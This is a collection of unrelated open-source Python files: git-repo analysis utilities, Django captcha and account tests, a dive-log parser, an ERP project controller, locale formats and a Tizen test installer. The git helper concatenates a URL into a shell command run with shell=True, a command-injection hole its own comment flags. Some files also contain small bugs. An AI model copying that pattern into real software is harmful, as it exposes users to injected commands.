a human-readable name (bigbang) by looking at the word between the last "/" and ".git".
"""
def url_to_name(url):
url = url.replace("\n", "");
name = nameRegex.search(url).group(1);
return name;
"""
Converts a name of a repo to its filepath.
Currently, these go to ../archives/sample_git_repos/{name}/
"""
def name_to_filepath(name):
newLoc = repoLocation + name
return newLoc
"""
Converts a filepath (../archives/sample_git_repos/{name}) to a name.
Note that this will fail if the filepath ends in a "/". It must end
in the name of the folder.
Thus, it should be ../archives/sample_git_repos/{name} not
../archives/sample_git_repos/{name}/
"""
def filepath_to_name(filepath):
name = fileRegex.search(filepath).group(1);
return name;
"""
Converts a dictionary of dependencies into a NetworkX DiGraph.
"""
def create_graph(dic):
G = nx.DiGraph()
for f in dic:
for dependency in dic[f]:
G.add_edge(f, dependency)
return G
"""
Returns a list of the Python files in a directory, and
converts IPython notebooks into Python source code and
includes them with the Python files.
"""
def get_files(filepath):
os.chdir(filepath)
files = []
for root, dirnames, filenames in os.walk("."):
for filename in fnmatch.filter(filenames, '*.py'):
files.append(os.path.join(root, filename))
for filename in fnmatch.filter(filenames, '*.ipynb'):
try:
with open(filename) as fh:
nb = nbformat.reads_json(fh.read())
export_path = filename.replace(".ipynb", ".py")
exporter = PythonExporter()
source, meta = exporter.from_notebook_node(nb)
with open(export_path, 'w+') as fh:
fh.writelines(source)
files.append()
except: #may have issues with JSON encoding
pass
return files
"""
Given a directory, collects all Python and IPython files and
uses the Python AST to create a dictionary of dependencies from them.
Returns the dependencies converted into a NetworkX graph.
"""
def get_dependency_network(filepath):
files = get_files(filepath)
dependencies = {}
for file in set(files):
ast = compiler.parseFile(file)
for node in ast.getChildren()[1].nodes:
if isinstance(node, Import):
if file in dependencies:
dependencies[file].append(node.names[0][0])
else:
dependencies[file] = [node.names[0][0]]
elif isinstance(node, From):
if file in dependencies:
dependencies[file].append(node.modname + "/" + node.names[0][0])
return create_graph(dependencies)
"""
Takes three different options for type:
'remote' : basically a git url
'name' (default): a name like 'scipy' which the method can expand to a url
'local' : a filepath to a file on the local system (basically an existing git directory on this computer)
This returns an initialized GitRepo object with its data and name already loaded.
"""
def get_repo(repo_in, in_type='name', update = False):
# Input is name
if in_type == 'name':
filepath = name_to_filepath(repo_in)
ans = None;
if not update:
ans = get_cache(repo_in);
if ans is not None:
return ans;
print("Checking for " + str(repo_in) + " at " + str(filepath));
ans = get_repo(filepath, 'local', update);
if isinstance(ans, GitRepo):
ans.commit_data.to_csv(cache_path(repo_in), sep='\t', encoding='utf-8') # We cache it hopefully???
else:
print("We failed to find a local copy of this repo")
return ans;
# Input is a local file
if in_type == 'local':
if repo_already_exists(repo_in):
name = filepath_to_name(repo_in);
return GitRepo(url=repo_in, name=name);
else:
print("Invalid filepath: " + repo_in);
return None;
if in_type == 'remote':
name = url_to_name(repo_in);
filepath = name_to_filepath(name);
if not repo_already_exists(filepath):
print("Gloning the repo from remote")
fetch_repo(repo_in);
return get_repo(name, 'name', update);
else:
print("Invalid input") # TODO: Clarify this error
return None
"""
Takes in a git url and uses shell commands
to clone the git repo into sample_git_repos/
TODO: We shouldn't use this with shell=True because of security concerns.
"""
def fetch_repo(url):
# TODO: We are repeatedly calculating name and filepath
url = url.replace("\n", "");
name = url_to_name(url);
newLoc = name_to_filepath(name);
command = ["git " + "clone " + url + " " + newLoc];
subprocess.call(command, shell = True);
"""
Takes in a name (bigbang)
Returns where its cached file should be (../sample_git_repos/bigbang_backup.csv)
"""
def cache_path(name):
return repoLocation + str(name) + "_backup.csv"
"""
Takes in a name (bigbang)
Returns a GitRepo object containing the cache data if the cache exists
Returns None otherwise.
"""
def get_cache(name):
filepath = cache_path(name);
if os.path.exists(filepath):
c = pd.read_csv(filepath, sep='\t', encoding='utf-8');
fp = name_to_filepath(name);
ans = GitRepo(name=name, url=fp, cache=c);
return ans;
return None;
"""
As of now, this only accepts names/repos, not local urls
TODO: This could be optimized
"""
def get_multi_repo(repo_names=None, repos=None):
if repos is None:
repos = list()
for name in repo_names:
repo = get_repo(name, in_type = "name")
repos.append(repo);
for repo in repos:
repo.commit_data["Repo Name"] = repo.name;
ans = MultiGitRepo(repos);
return ans
"""
fetches a list of all repos in an organization from github
and gathers their URL's (of the form *.git)
It dumps these into ../examples/{org_name}_urls.txt
"""
def load_org_repos(org_name):
github_url = "https://api.github.com/orgs/" + org_name + "/repos"
r = requests.get(github_url)
data = r.json()
urls = []
for repo in data:
if "git_url" in repo:
urls.append(repo["git_url"])
if len(urls) == 0:
print("Found no repos in group: " + str(org_name))
return None
else:
addr = examplesLocation + str(org_name) + "_urls.txt"
f = open(addr, 'w')
f.write("\n".join(urls))
print("Wrote git urls to " + addr)
return urls
"""
Checks to see if we have the urls for a given org
If we don't, it fetches them.
Once we do, it returns a list of GitRepo objects from the urls.
"""
def get_org_repos(org_name):
addr = examplesLocation + str(org_name) + "_urls.txt"
urls = None
if not os.path.isfile(addr):
urls = load_org_repos(org_name);
else:
urls = open(addr, "r")
ans = list()
for url in urls:
ans.append(get_repo(url, "remote"))
return ans;
def get_org_multirepo(org_name):
    """Build a MultiGitRepo spanning every repo of a GitHub organization."""
    return get_multi_repo(repos=get_org_repos(org_name))
| gpl-2.0 |
Jaidan/django-simple-captcha | captcha/tests/views.py | 3 | 1244 | from django import forms
from captcha.fields import CaptchaField
from django.template import Context, RequestContext, loader
from django.http import HttpResponse
TEST_TEMPLATE = r'''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<title>captcha test</title>
</head>
<body>
{% if passed %}
<p style="color:green">Form validated</p>
{% endif %}
<form action="{% url captcha-test %}" method="post">
{{form.as_p}}
<p><input type="submit" value="Continue →"></p>
</form>
</body>
</html>
'''
def test(request):
    """Render and validate a demo form containing a CaptchaField."""
    class CaptchaTestForm(forms.Form):
        subject = forms.CharField(max_length=100)
        sender = forms.EmailField()
        captcha = CaptchaField(help_text='asdasd')
    if request.POST:
        form = CaptchaTestForm(request.POST)
        if form.is_valid():
            passed = True
    else:
        form = CaptchaTestForm()
    # locals() hands ``form`` (and ``passed``, only when validation
    # succeeded) to TEST_TEMPLATE; {% if passed %} is simply false when the
    # variable is unset.
    t = loader.get_template_from_string(TEST_TEMPLATE)
    return HttpResponse(t.render(RequestContext(request, locals())))
| mit |
AquaBSD/libbuhlmann | test/parse_dive.py | 1 | 1088 | #! /usr/bin/python
import argparse
from xml.dom import minidom
# Default gas mixture: air (21% oxygen, no helium), used when the XML does
# not override it. Percentages become fractions once parsed below.
O2=21
H2=0
parser = argparse.ArgumentParser(description='Parse a dive in xml formt.')
parser.add_argument('-f', '--file', required=True,
                    dest='path', help='path to xml file')
args = parser.parse_args()
path = args.path
doc = minidom.parse(path)
# Read the breathing mixture from the first <DiveMixture> element.
# NOTE(review): raises AttributeError when no <DiveMixture> exists --
# confirm the schema always provides one.
gas = doc.getElementsByTagName('DiveMixture')
for subNode in gas.item(0).childNodes:
    if (subNode.nodeName == "Oxygen"):
        O2=float(subNode.childNodes[0].nodeValue)/100
    if (subNode.nodeName == "Helium"):
        H2=float(subNode.childNodes[0].nodeValue)/100
# Emit one "time depth O2 He" line per <Dive.Sample>.
# NOTE(review): the "/10 + 1" depth and "/60" time conversions assume
# decimetre depths and second timestamps -- confirm against the format.
nodes = doc.getElementsByTagName('Dive.Sample')
for node in nodes:
    if node.hasChildNodes() and len(node.childNodes) > 8:
        for subNode in node.childNodes:
            if (subNode.nodeName == "Depth" and subNode.hasChildNodes()):
                depth = (float(subNode.childNodes[0].nodeValue) / 10) + 1
            if (subNode.nodeName == "Time" and subNode.hasChildNodes()):
                time = float(subNode.childNodes[0].nodeValue) / 60
        print ("%.2f %.2f %.2f %.2f" % (time , depth, O2, H2))
zookeepr/zookeepr | zkpylons/tests/functional/test_account.py | 3 | 15167 | from datetime import datetime, timedelta
import re
from zk.model import Person, PasswordResetConfirmation
from routes import url_for
from .fixtures import PersonFactory, PasswordResetConfirmationFactory
from .utils import do_login, isSignedIn
class TestPersonController(object):
def test_registration_confirmation_url(self, map):
"""test the routing of the registration confirmation url"""
expect = dict(controller='person', action='confirm', confirm_hash='N')
assert map.match('/person/confirm/N') == expect
def test_registratrion_confirmation_named_route(self):
reg_confirm = url_for('acct_confirm', confirm_hash='N')
assert reg_confirm == '/person/confirm/N'
def test_person_signin_routing(self, map):
expect = dict(controller='person', action='signin')
assert map.match('/person/signin') == expect
def test_person_signin_url(self):
assert url_for(controller='person', action='signin', id=None) == '/person/signin'
def test_person_signout_url(self):
assert url_for(controller='person', action='signout', id=None) == '/person/signout'
    def test_signin_signout(self, app, db_session):
        """Sign in, stay signed in across pages, then sign out."""
        # create a user
        p = PersonFactory()
        db_session.commit()
        resp = do_login(app, p)
        assert isSignedIn(app)
        # see if we're still logged in when we go to another page
        resp = app.get(url_for(controller='home'))
        assert isSignedIn(app)
        # sign out
        resp = resp.goto('/person/signout')
        assert not isSignedIn(app)
    def test_signin_invalid(self, app, db_session):
        """Test invalid login details"""
        # Bogus credentials must not establish a session.
        do_login(app, 'invalid-email', 'invalid-password')
        assert not isSignedIn(app)
    def test_signin_unconfirmed(self, app, db_session):
        """An unactivated account can sign in but is redirected away from
        proposals and registration until the email is confirmed."""
        # create a user
        p = PersonFactory(activated=False)
        db_session.commit()
        # Without activation you can log in but not register or put in a proposal
        resp = do_login(app, p)
        assert isSignedIn(app)
        resp.follow()
        resp = app.get('/programme/submit_a_proposal')
        resp = resp.follow()
        assert 'Check your email for activation instructions.' in unicode(resp.body, 'utf-8')
        resp = app.get('/register/status')
        resp = resp.follow()
        assert 'Check your email for activation instructions.' in unicode(resp.body, 'utf-8')
        resp = app.get('/registration/new')
        resp = resp.follow()
        assert 'Check your email for activation instructions.' in unicode(resp.body, 'utf-8')
    def test_registration_confirmation(self, app, db_session):
        """Visiting the emailed hash URL activates the account."""
        # insert registration model object
        p = PersonFactory(activated=False)
        db_session.commit()
        # visit the link
        resp = app.get('/person/confirm/' + p.url_hash)
        assert 'Thanks for confirming your account' in unicode(resp.body, 'utf-8')
        # Need to forget the objects we created
        db_session.expunge_all()
        # test that it's activated
        r = Person.find_by_id(p.id)
        assert r.activated == True
    def test_registration_confirmation_invalid_url_hash(self, app, db_session):
        """test that an invalid hash doesn't activate anything"""
        response = app.get('/person/confirm/nonexistent', status=404)
        assert response.status_code == 404
def test_person_password_routing(self, map):
expect = dict(controller='person', action='forgotten_password')
assert map.match('/person/forgotten_password') == expect
def test_person_password_url_for(self):
assert url_for(controller='person', action='forgotten_password') == '/person/forgotten_password'
def test_person_confirm_routing(self, map):
expect = dict(controller='person', action='reset_password', url_hash='N')
assert map.match('/person/reset_password/N') == expect
def test_person_password_url_for(self):
assert url_for(controller='/person', action='reset_password', url_hash='N') == '/person/reset_password/N'
    def test_forgotten_password_full_process(self, app, db_session, smtplib):
        """End-to-end forgotten-password flow: request a reset, check the
        confirmation record and the plain-text email, follow the reset
        link, set a new password and verify the hash changed and the
        confirmation record was consumed."""
        p = PersonFactory(activated=False)
        db_session.commit()
        # get the login page
        resp = app.get(url_for(controller='person', action='signin', id=None))
        # click on the forgotten password link
        resp = resp.click('Forgotten your password?')
        f = resp.forms['pwreset-form']
        f['email_address'] = p.email_address
        f.submit()
        # check that the confirmation record was created
        crecs = PasswordResetConfirmation.find_by_email(p.email_address)
        assert crecs is not None
        # check our email
        assert smtplib.existing != None
        # check to address
        to_match = re.match(r'^.*To:.*' + p.email_address, smtplib.existing.message, re.DOTALL)
        assert to_match != None
        # check that the email has no HTML in it and thus was not rendered
        # incorrectly
        html_match = re.match(r'^.*<!DOCTYPE', smtplib.existing.message, re.DOTALL)
        assert html_match == None
        # check that the message has a url hash in it
        url_match = re.match(r'^.*(/person/reset_password/\S+)', smtplib.existing.message, re.DOTALL)
        assert url_match != None
        # ok go to the URL, on treadmills
        resp = app.get(url_match.group(1))
        # set password
        f = resp.forms['reset-form']
        f['password'] = 'passwdtest'
        f['password_confirm'] = 'passwdtest'
        resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
        # Need to forget the objects we created, save ones that need saving
        pid = p.id
        old_hash = p.password_hash
        db_session.expunge_all()
        # check that the password was changed
        p = Person.find_by_id(pid)
        assert p.password_hash != old_hash
        # check that the confirmatin record is gone
        crecs = PasswordResetConfirmation.find_by_email(p.email_address)
        assert crecs is None
    def test_forgotten_password_no_person(self, app, db_session, smtplib):
        """Test that an invalid email address doesn't start a password change.

        The response must be indistinguishable from a successful request
        (no account-existence leak), no confirmation record is created,
        and an informational email goes to the given address."""
        resp = app.get(url_for(controller='person', action='signin'))
        resp = resp.click('Forgotten your password?')
        f = resp.forms['pwreset-form']
        f['email_address'] = 'nonexistent@example.org'
        resp = f.submit()
        # Old behaviour was to report that the address didn't exist
        # This is a mild security leak and was changed at some point
        # Change discussed and confirmed in #413
        # New behaviour is to display the standard prompt page
        # An email is also sent to the given address indicating the attempt
        # Standard response page
        assert "complete the password reset process" in unicode(resp.body, 'utf-8')
        # No reset entry created, no find_all method
        assert db_session.query(PasswordResetConfirmation).count() == 0
        # Email sent
        assert "nonexistent@example.org" in smtplib.existing.to_addresses
    def test_confirm_404(self, app):
        """Test that an attempt to access an invalid url_hash throws a 404"""
        # status=404 makes webtest assert the response code itself; the
        # returned response object is not inspected further.
        resp = app.get(url_for(action='reset_password',
                               controller='person',
                               url_hash='n'
                               ),
                       status=404
                       )
    def test_confirm_old_url_hash(self, app, db_session):
        """Test that old url_hashes are caught"""
        # 1.1 days is just past the apparent 24-hour validity window —
        # NOTE(review): confirm the cutoff against the controller.
        stamp = datetime.now() - timedelta(days=1.1)
        c = PasswordResetConfirmationFactory(timestamp = stamp)
        db_session.commit()
        resp = app.get(url_for(controller='person',
                               action='reset_password',
                               url_hash=c.url_hash))
        # TODO: Ensure confirm must match
        # Prompted to enter new password
        f = resp.forms['reset-form']
        f['password'] = 'test'
        f['password_confirm'] = 'test'
        resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
        # check for warning
        assert "This password recovery session has expired" in unicode(resp.body, 'utf-8')
        # Need to forget the objects we created
        db_session.expunge_all()
        # Outstanding confirmation should be gone
        crecs = PasswordResetConfirmation.find_by_email(c.email_address)
        assert crecs is None
def test_confirm_reset(self, app, db_session):
"""Test confirmation of a password reset that should succeed"""
# create a confirmation record
p = PersonFactory()
# set the timestamp to just under 24 hours ago
stamp = datetime.now() - timedelta(days=0.9)
c = PasswordResetConfirmationFactory(email_address=p.email_address, timestamp=stamp)
db_session.commit()
resp = app.get(url_for(controller='person',
action='reset_password',
url_hash=c.url_hash))
# showing the email on the page
assert c.email_address in unicode(resp.body, 'utf-8')
f = resp.forms['reset-form']
f['password'] = 'test'
f['password_confirm'] = 'test'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
resp = resp.maybe_follow()
# check for success
assert "Your password has been updated" in unicode(resp.body, 'utf-8')
# Need to forget the objects we created, save portions we need
pid = p.id
old_password_hash = p.password_hash
db_session.expunge_all()
# conf rec should be gone
crecs = PasswordResetConfirmation.find_by_email(c.email_address)
assert crecs is None
# password should be changed
p = Person.find_by_id(pid)
assert p.password_hash == old_password_hash
    def test_duplicate_password_reset(self, app, db_session, smtplib):
        """Try to reset a password twice.

        A second request while a confirmation record is outstanding must
        be refused with an 'already in progress' message."""
        p = PersonFactory()
        db_session.commit()
        resp = app.get(url_for(controller='person', action='signin'))
        resp = resp.click('Forgotten your password?')
        f = resp.forms['pwreset-form']
        f['email_address'] = p.email_address
        f.submit()
        crec = PasswordResetConfirmation.find_by_email(p.email_address)
        assert crec is not None
        # submit a second time
        resp = f.submit()
        assert "password recovery process is already in progress" in unicode(resp.body, 'utf-8')
    def test_login_failed_warning(self, app, db_session):
        """Test that you get an appropriate warning message from the form when you try to log in with invalid credentials.
        """
        resp = app.get(url_for(controller='person', action='signin', id=None))
        f = resp.forms['signin-form']
        # credentials that match no account in the (empty) test database
        f['person.email_address'] = 'test@failure.zk'
        f['person.password'] = 'broken'
        resp = f.submit()
        assert "Your sign-in details are incorrect" in unicode(resp.body, 'utf-8')
    def test_create_person(self, app, db_session, smtplib):
        """Test the process of creating new persons.

        Full account-creation flow: submit the sign-up form, verify the
        plain-text confirmation email, follow the confirmation link,
        check the account is activated and auto-signed-in, then sign out
        and back in with the new credentials."""
        # get the home page
        resp = app.get('/person/signin')
        # click on the 'create new account' link
        resp = resp.click('Sign up')
        # fill out the form
        f = resp.form
        f['person.email_address'] = 'testguy@example.org'
        f['person.firstname'] = 'Testguy'
        f['person.lastname'] = 'McTest'
        f['person.password'] = 'test'
        f['person.password_confirm'] = 'test'
        f['person.phone'] = '123'
        f['person.mobile'] = '123'
        f['person.address1'] = 'here'
        f['person.city'] = 'there'
        f['person.postcode'] = '1234'
        f['person.country'] = 'AUSTRALIA'
        f['person.i_agree'] = '1'
        resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
        # did we get an appropriate page?
        resp = resp.maybe_follow() # Shake out redirects
        assert "Check your email" in unicode(resp.body, 'utf-8')
        # check our email
        assert smtplib.existing is not None
        message = smtplib.existing
        # check that it went to the right place
        assert "testguy@example.org" in message.to_addresses
        # check that the message has the to address in it
        to_match = re.match(r'^.*To:.*testguy@example.org.*', message.message, re.DOTALL)
        assert to_match is not None
        # check that the message has the user's name
        name_match = re.match(r'^.*Testguy.*McTest', message.message, re.DOTALL)
        assert name_match is not None
        # check that the message was renderered without HTML, i.e.
        # as a fragment and thus no autohandler crap
        html_match = re.match(r'^.*<!DOCTYPE', message.message, re.DOTALL)
        assert html_match is None
        # check that the message has a url hash in it
        match = re.match(r'^.*/person/confirm/(\S+)', message.message, re.DOTALL)
        assert match is not None
        # visit the url
        resp = app.get('/person/confirm/%s' % match.group(1))
        # check the rego worked
        reg = Person.find_by_email('testguy@example.org')
        assert reg is not None
        assert reg.activated == True
        # We should be automatically signed in
        assert isSignedIn(app)
        # Log out, so we can log in again
        resp = resp.goto('/person/signout')
        resp = resp.maybe_follow()
        assert not isSignedIn(app)
        # Ensure login works
        resp = resp.click('Sign in')
        f = resp.forms['signin-form']
        f['person.email_address'] = 'testguy@example.org'
        f['person.password'] = 'test'
        resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
        assert 'details are incorrect' not in resp
        assert isSignedIn(app)
        # TODO: Test Config.get('account_creation') == false
def test_create_duplicate_person(self, app, db_session):
# create a fake user
p = PersonFactory()
db_session.commit()
resp = app.get('/person/new')
print resp
f = resp.form
f['person.email_address'] = p.email_address
f['person.firstname'] = 'Testguy'
f['person.lastname'] = 'McTest'
f['person.password'] = 'test'
f['person.password_confirm'] = 'test'
f['person.phone'] = '123'
f['person.mobile'] = '123'
f['person.address1'] = 'here'
f['person.city'] = 'there'
f['person.postcode'] = '1234'
f['person.country'] = 'AUSTRALIA'
f['person.i_agree'] = '1'
resp = f.submit(extra_environ=dict(REMOTE_ADDR='0.0.0.0'))
assert 'A person with this email already exists.' in unicode(resp.body, 'utf-8')
resp.click('recover your password')
| gpl-2.0 |
saurabh6790/med_new_app | projects/doctype/project/project.py | 28 | 2184 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.utils import flt, getdate
from webnotes import msgprint
from utilities.transaction_base import delete_events
class DocType:
	"""Project controller: computes gross margin, validates the date
	range, tracks task-based completion percentage and mirrors project
	milestones as calendar Events."""

	def __init__(self, doc, doclist=None):
		self.doc = doc
		self.doclist = doclist

	def get_gross_profit(self):
		"""Return {'gross_margin_value', 'per_gross_margin'} for the project.

		Fix: guard the percentage computation so a missing/zero
		project_value no longer raises ZeroDivisionError (the original
		guard had been commented out).
		"""
		pft, per_pft = 0, 0
		pft = flt(self.doc.project_value) - flt(self.doc.est_material_cost)
		if flt(self.doc.project_value):
			per_pft = (flt(pft) / flt(self.doc.project_value)) * 100
		ret = {'gross_margin_value': pft, 'per_gross_margin': per_pft}
		return ret

	def validate(self):
		"""validate start date before end date"""
		if self.doc.project_start_date and self.doc.completion_date:
			if getdate(self.doc.completion_date) < getdate(self.doc.project_start_date):
				msgprint("Expected Completion Date can not be less than Project Start Date")
				raise Exception

	def on_update(self):
		# keep calendar events in sync whenever the project is saved
		self.add_calendar_event()

	def update_percent_complete(self):
		"""Recompute percent_complete from this project's closed/cancelled tasks."""
		total = webnotes.conn.sql("""select count(*) from tabTask where project=%s""",
			self.doc.name)[0][0]
		if total:
			completed = webnotes.conn.sql("""select count(*) from tabTask where
				project=%s and status in ('Closed', 'Cancelled')""", self.doc.name)[0][0]
			webnotes.conn.set_value("Project", self.doc.name, "percent_complete",
				int(float(completed) / total * 100))

	def add_calendar_event(self):
		"""Recreate one private Event per dated project milestone."""
		# delete any earlier event for this project
		delete_events(self.doc.doctype, self.doc.name)

		# add events
		for milestone in self.doclist.get({"parentfield": "project_milestones"}):
			if milestone.milestone_date:
				description = (milestone.milestone or "Milestone") + " for " + self.doc.name
				webnotes.bean({
					"doctype": "Event",
					"owner": self.doc.owner,
					"subject": description,
					"description": description,
					"starts_on": milestone.milestone_date + " 10:00:00",
					"event_type": "Private",
					"ref_type": self.doc.doctype,
					"ref_name": self.doc.name
				}).insert()

	def on_trash(self):
		# remove the mirrored calendar events along with the project
		delete_events(self.doc.doctype, self.doc.name)
| agpl-3.0 |
zrhans/pythonanywhere | .virtualenvs/django19/lib/python3.4/site-packages/django/conf/locale/nn/formats.py | 504 | 1810 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1  # Monday

# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = [
    '%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y',  # '2006-10-25', '25.10.2006', '25.10.06'
    # '%d. %b %Y', '%d %b %Y',           # '25. okt 2006', '25 okt 2006'
    # '%d. %b. %Y', '%d %b. %Y',         # '25. okt. 2006', '25 okt. 2006'
    # '%d. %B %Y', '%d %B %Y',           # '25. oktober 2006', '25 oktober 2006'
]
DATETIME_INPUT_FORMATS = [
    '%Y-%m-%d %H:%M:%S',     # '2006-10-25 14:30:59'
    '%Y-%m-%d %H:%M:%S.%f',  # '2006-10-25 14:30:59.000200'
    '%Y-%m-%d %H:%M',        # '2006-10-25 14:30'
    '%Y-%m-%d',              # '2006-10-25' (was listed twice; duplicate removed)
    '%d.%m.%Y %H:%M:%S',     # '25.10.2006 14:30:59'
    '%d.%m.%Y %H:%M:%S.%f',  # '25.10.2006 14:30:59.000200'
    '%d.%m.%Y %H:%M',        # '25.10.2006 14:30'
    '%d.%m.%Y',              # '25.10.2006'
    '%d.%m.%y %H:%M:%S',     # '25.10.06 14:30:59'
    '%d.%m.%y %H:%M:%S.%f',  # '25.10.06 14:30:59.000200'
    '%d.%m.%y %H:%M',        # '25.10.06 14:30'
    '%d.%m.%y',              # '25.10.06'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '\xa0'  # non-breaking space
NUMBER_GROUPING = 3
| apache-2.0 |
qiuzhong/crosswalk-test-suite | wrt/wrt-digitalsign-tizen-tests/inst.wgt.py | 12 | 7100 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = ""
PKG_SRC_DIR = ""
def doCMD(cmd):
    """Run *cmd* through a shell, echoing its output line by line.

    Returns a (return_code, output_lines) tuple; return_code is the
    process exit status (or the initial 1 if Popen never produced one).
    """
    # Do not need handle timeout in this short script, let tool do it
    print "-->> \"%s\"" % cmd
    output = []
    cmd_return_code = 1
    cmd_proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)

    while True:
        output_line = cmd_proc.stdout.readline().strip("\r\n")
        cmd_return_code = cmd_proc.poll()
        # poll() is None while the child is running; stop only when it
        # has exited and the pipe is drained.
        if output_line == '' and cmd_return_code is not None:
            break
        sys.stdout.write("%s\n" % output_line)
        sys.stdout.flush()
        output.append(output_line)

    return (cmd_return_code, output)
def updateCMD(cmd=None):
    """Return *cmd*, wrapping package-manager calls so they run as the
    configured device user with the session D-Bus environment set."""
    # Only 'pkgcmd' invocations need the su/XW_ENV wrapper; everything
    # else is passed through untouched.
    if "pkgcmd" not in cmd:
        return cmd
    return "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
def getUSERID():
    """Query the target device for the numeric uid of PARAMETERS.user.

    Returns the (return_code, output) pair from doCMD.
    """
    if PARAMETERS.mode == "SDB":
        cmd = "sdb -s %s shell id -u %s" % (
            PARAMETERS.device, PARAMETERS.user)
    else:
        cmd = "ssh %s \"id -u %s\"" % (
            PARAMETERS.device, PARAMETERS.user)
    return doCMD(cmd)
def getPKGID(pkg_name=None):
    """Return the installed package id for *pkg_name*, or None.

    Parses the output of 'pkgcmd -l' on the device; lines contain
    '[name]' and a 'pkgid [id]' token pair.
    """
    if PARAMETERS.mode == "SDB":
        cmd = "sdb -s %s shell %s" % (
            PARAMETERS.device, updateCMD('pkgcmd -l'))
    else:
        cmd = "ssh %s \"%s\"" % (
            PARAMETERS.device, updateCMD('pkgcmd -l'))

    (return_code, output) = doCMD(cmd)
    if return_code != 0:
        return None

    test_pkg_id = None
    for line in output:
        if line.find("[" + pkg_name + "]") != -1:
            # the pkgid value is the bracketed token following 'pkgid'
            pkgidIndex = line.split().index("pkgid")
            test_pkg_id = line.split()[pkgidIndex + 1].strip("[]")
            break
    return test_pkg_id
def doRemoteCMD(cmd=None):
    """Execute *cmd* on the target device via sdb or ssh and return the
    (return_code, output) pair from doCMD."""
    wrapped = updateCMD(cmd)
    if PARAMETERS.mode == "SDB":
        remote = "sdb -s %s shell %s" % (PARAMETERS.device, wrapped)
    else:
        remote = "ssh %s \"%s\"" % (PARAMETERS.device, wrapped)
    return doCMD(remote)
def doRemoteCopy(src=None, dest=None):
    """Copy *src* to *dest* on the target device.

    Returns True on success and False on failure.

    Fix: the return value was inverted — the function returned True
    when the copy command *failed* (return_code != 0), so every caller
    (``if not doRemoteCopy(...)``) recorded successful copies as
    failures and ignored real ones.
    """
    if PARAMETERS.mode == "SDB":
        cmd_prefix = "sdb -s %s push" % PARAMETERS.device
        cmd = "%s %s %s" % (cmd_prefix, src, dest)
    else:
        cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)

    (return_code, output) = doCMD(cmd)
    doRemoteCMD("sync")

    # Zero exit status means the copy succeeded.
    return return_code == 0
def uninstPKGs():
    """Uninstall every .wgt package found under SCRIPT_DIR and remove
    the deployed test directory on the device.

    Returns True only if every step succeeded.
    """
    action_status = True
    for root, dirs, files in os.walk(SCRIPT_DIR):
        # mediasrc holds media fixtures, not installable packages
        if root.endswith("mediasrc"):
            continue
        for file in files:
            if file.endswith(".wgt"):
                pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
                if not pkg_id:
                    action_status = False
                    continue
                (return_code, output) = doRemoteCMD(
                    "pkgcmd -u -t wgt -q -n %s" % pkg_id)
                for line in output:
                    if "Failure" in line:
                        action_status = False
                        break

    (return_code, output) = doRemoteCMD(
        "rm -rf %s" % PKG_SRC_DIR)
    if return_code != 0:
        action_status = False

    return action_status
def instPKGs():
    """Push and install the suite's .wgt package, then copy all other
    payload files into PKG_SRC_DIR on the device.

    Returns True only if every step succeeded.
    """
    action_status = True
    (return_code, output) = doRemoteCMD(
        "mkdir -p %s" % PKG_SRC_DIR)
    if return_code != 0:
        action_status = False

    for root, dirs, files in os.walk(SCRIPT_DIR):
        # mediasrc holds media fixtures, not installable packages
        if root.endswith("mediasrc"):
            continue
        for file in files:
            if file.endswith("%s.wgt" % PKG_NAME):
                if not doRemoteCopy(
                        os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
                    action_status = False
                (return_code, output) = doRemoteCMD(
                    "pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
                doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
                for line in output:
                    if "Failure" in line:
                        action_status = False
                        break

    # Do some special copy/delete... steps
    '''
    (return_code, output) = doRemoteCMD(
        "mkdir -p %s/tests" % PKG_SRC_DIR)
    if return_code != 0:
        action_status = False

    if not doRemoteCopy("specname/tests", "%s/tests" % PKG_SRC_DIR):
        action_status = False
    '''

    for item in glob.glob("%s/*" % SCRIPT_DIR):
        # NOTE(review): this file is named inst.wgt.py, which does NOT
        # end with "inst.py", so the installer script itself is copied
        # to the device here — confirm whether that is intended.
        if item.endswith("inst.py"):
            continue
        else:
            item_name = os.path.basename(item)
            if not doRemoteCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
                action_status = False

    return action_status
def main():
    """Parse options, resolve the target device and user, set up the
